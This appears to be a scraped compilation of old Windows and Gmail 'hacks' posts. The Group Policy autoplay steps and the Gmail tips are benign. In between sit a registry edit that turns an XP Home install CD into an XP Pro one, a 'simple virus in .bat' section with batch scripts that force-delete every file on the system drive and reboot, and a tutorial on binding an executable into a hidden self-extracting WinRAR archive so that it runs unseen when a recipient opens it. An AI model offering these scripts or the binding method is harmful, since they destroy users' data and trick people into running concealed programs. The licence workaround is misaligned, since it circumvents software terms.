You will see the Group Policy window. Then select Administrative Templates \ System in the tree

You will see an item in the right side pane called “Turn off Autoplay”

Double click on that item, and set the radio button to Enabled, and change the “Turn off Autoplay on” to All Drives.

Now you have disable autorun of usb and cds on your windows
If you have problem check here
http://www.howtogeek.com/howto/windows/disable-autoplay-of-audio-cds-and-usb-drives/

HOW TO Change Windows XP Home to Windows XP Pro

We can’t vouch for this hack, because we are too lazy to try it (and we never, ever violate copyrights or EULAs), but kind reader Martin explains the process for turning an Windows XP Home install disc to a Windows XP Pro disc after the jump.

It sounds pretty simple to do (just some registry changes), but you can’t install Service Pack 2, so you might try to slipstream in the changes to your modified install disc (if that’s even possible).

Alternately, buy XP Pro, or get a Mac.

Code:
yes indeed, you can’t change an installed Windows but only your Installation CD (or even a recovery CD in case the manufacturer had not left out important parts)

Here’s the detailed breakdown you asked for.

1. Copy the root directory and the i386 directory of the WindowsXP CD
to your harddisk
2. Extract the Bootsector of your WindowsXP CD
3. Change 2 Bytes in i386\Setupreg.hiv :
a) Open Regedit
b) Highlight HKEY_LOCAL_MACHINE
c) Menu: File -> Load Structure -> i386\Setupreg.hiv
d) Assign an arbitrary name to the imported structure e.g. “Homekey”
e) Goto HKEY_LOCAL_MACHINE\Homekey\ControlSet001\Services\setupdd
f) edit the binary key “default” and change “01” to “00” and “02” to
“00”
g) Highlight “Homekey” and select menu: File -> unload structure
4. Burn your new XP Pro CD
5. Install WindowsXP as usual. Your XP Home Key will work.

Note: You cannot apply SP2 to such a WindowsXP Pro, so step 1.b)
might be to integrate SP2 in your Installation CD

Please check the menu-entries as I don’t owe an English copy of
XP and have to guess them.

simple virus in .bat

simple virus in .bat: "use these scripts on your own responsibility..

1.This Virus Deletes All The Content Of A Drive…

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

2.The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* y

Save It As Anything.bat

3.The below Code Will Just Restart Ur PC

@echo off shutdown -r -f -t 00

save as anyname.bat"

Change I.E title bar text

Change I.E title bar text: "Go to>Start
>Run
>Regedit

Path: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main.

Modify/Create the Value Name “Window Title” according to the Value Data listed below.
Data Type: REG_SZ [String Value]
Value Name: Window Title
Value Data: [Enter The Text Desired In Title Bar]
Exit Registry and Reboot"

How to make file undetectable

How to make file undetectable: "Use binding ,this is simple binding.In this tutorial you will see how to bind two files together using WinRAR.This is useful if you are sending a file and you want it to extract and run straight away.For this tutorial I will be using a simple .exe file (command[1].exe) and game.exe file

Step 1:Get the files you want to bind.

Step 2:Highlight them both and add to archive.

Step 3:Change the name and select “Create SFX archive”

Step 4:Go to the “Advanced” tab at the top and click on “SFX options”

Step 5:In the “General” tab type in the name of the file you want to run after the extraction.

Step 6:Go to the “Modes” tab and select “Hide all”

Step 7:Go to the “Text and icon” tab and change the icon to something other than the WinRAR icon

Step 8:Click “OK” on the advanced window and “OK” in the main window and it will create the file.

Now when the user clicks on it extracts and automatically runs command[1].exe
This can be used in a variety of ways, you can experiment with the options to get different results."

100 Great Gmail Hacks for Email Addicts

If you’re a Gmail user, you know that it’s a powerful email tool, even if you’re just using it for basic functions. However, there are so many options and hacks that you can take advantage of to take your email to the next level that it can be worth your while to learn a little bit more about what Gmail is really capable of doing. Read on tolearn about 100 ways to hack Gmail for the better.

Shortcuts
Take these shortcuts to work in Gmail faster.

  1. Keyboard Shortcuts: These shortcuts will help you avoid having to use your mouse in Gmail.
  2. Use Quick Links: Quick Links can bookmark anything in Gmail to set up quick access.
  3. See shortcuts: Type “?” to get a shortcut popup.
  4. Set up custom shortcuts: You can set up custom keyboard shortcuts through Gmail’s settings.
  5. Use EOM: Type “EOM” or (EOM) in the subject line of a subject-only message, and Gmail won’t ask you if you want to add text to the body.
  6. Shift-click: You can select multiple messages using Shift-click.

Moving & Identity
Move over to Gmail and manage your identity using these hacks.

  1. Change your Gmail email ID: This hack will help you find a solution for changing your Gmail ID.
  2. Change your From and Reply to address: Tweak these settings to show the address you want.
  3. Import your email: You can import mail and contacts from other email providers, and even have messages forwarded.

Automation
These hacks will help make Gmail work for you.

  1. Set up repetitive emails: Set up AutoHotKey HotStrings to take care of repetitive email quickly.
  2. Check your POP3 More Often: With this hack, you’ll be able to have Gmail check your POP3 accounts often.
  3. Set Gmail as your default: Go into your settings to use Gmail for Mail To links.
  4. Save notes in your drafts: Keep notes handy by saving them in your drafts.
  5. Look at the title of your web browser: You can see the number of the new emails you have by looking at the title of your web browser.

Tools
These tools can ramp up your Gmail experience.

  1. Resizeable Textarea: This extension will allow you to change your text area without resizing your browser window.
  2. Better Gmail: Better Gmail adds features like hierarchical labels, unread messages, and more.
  3. GMAIL Backup Tool: Backup your Gmail with these tools.
  4. dragdropupload: With this add-on, you can drag and drop files directly to your Gmail.
  5. GTDInbox for Gmail: Use this extension to use Getting Things Done productivity.
  6. Greasemonkey: Make use of these Gmail scripts to make everything Gmail easier.

Composing
Put these hacks to work when writing emails.

  1. Drag and drop: You can drag and drop attachments instead of using the attach button.
  2. Change your default font and styling: This hack will allow you to change the default appearance of your emails.
  3. Add an HTML Signature: With this hack, you’ll be able to add an HTML signature to your email.
  4. Forward all: You can forward an entire conversation in a single email.
  5. Insert images: Share screenshots and other images with this hack.
  6. Create a mail merge: Use this hack for a mail merge in Gmail.
  7. Quote selected text: In a long thread, just pull out the text you really want to respond to.
  8. Use canned responses: Gmail has a new feature that allows you to save email templates and insert them right into your email.
  9. Quickly address Gmail users: Send an email to another Gmail user just by entering their username.
  10. Go offline: Take Gmail offline with Labs.
  11. Send email from your phone: Gmail has a free IMAP sync with your phone’s email client.

Time Savers
With these hacks, you’ll save time in Gmail.

  1. Preview attachments: Make sure you actually need to download a file by previewing them first.
  2. See which emails are sent to you: With personal level indicators, you can find out if an email was sent to you directly.
  3. Right click to read: Preview any email just by right clicking on it.
  4. Mark unread from here: Mark messages unread from a certain point using this feature.
  5. Convert to HTML: You can convert PDF, Word and more to HTML just by sending them as an attachment.
  6. Download all of your attachments: Use this hack to download every attachment from Gmail.
  7. Add multiple attachments to an email: Hold down your Ctrl key or Shift to add a group of attachments to your email.

Storage
These hacks will help you use Gmail as storage.

  1. Scan your manuals: Create PDFs of your manuals and email them to yourself.
  2. Mail yourself disallowed files: Certain files are not allowed to be mailed, but you can save them in your drafts folder.
  3. Backup your messages: You can forward email to a different address just in case.
  4. Use Gmail for MP3 or Storage: Here you’ll find out how to use GMail to store your MP3 files and play them.

Organization
You can keep Gmail well organized with these hacks.

  1. Clean up by moving emails: Clean your inbox using Move to like folders.
  2. Create aliases: You can create an infinite number of + aliases for Gmail.
  3. Merge contacts: Use this hack to merge all of your duplicate email contacts.
  4. Prefix labels: Use unique characters to bring labels up to the top of alphabetized lists.
  5. Use Superstars: Choose between several star icons to flag your messages.
  6. Sort by unread: Type “in:inbox is:unread” to filter all unread messages.
  7. Create filters: Filter emails so you don’t have to move them to folders later.
  8. Archive: Tidy up your inbox and put old email into storage using archiving.
  9. Use stars: Indicate special emails with the help of stars.
  10. Manage all your email accounts: Use Gmail to manage all of your accounts at once.
  11. Use labels: Scan your inbox quickly using labels.

Read more from here

http://www.accreditedonlinecolleges.com/blog/2010/100-great-gmail-hacks-for-email-addicts/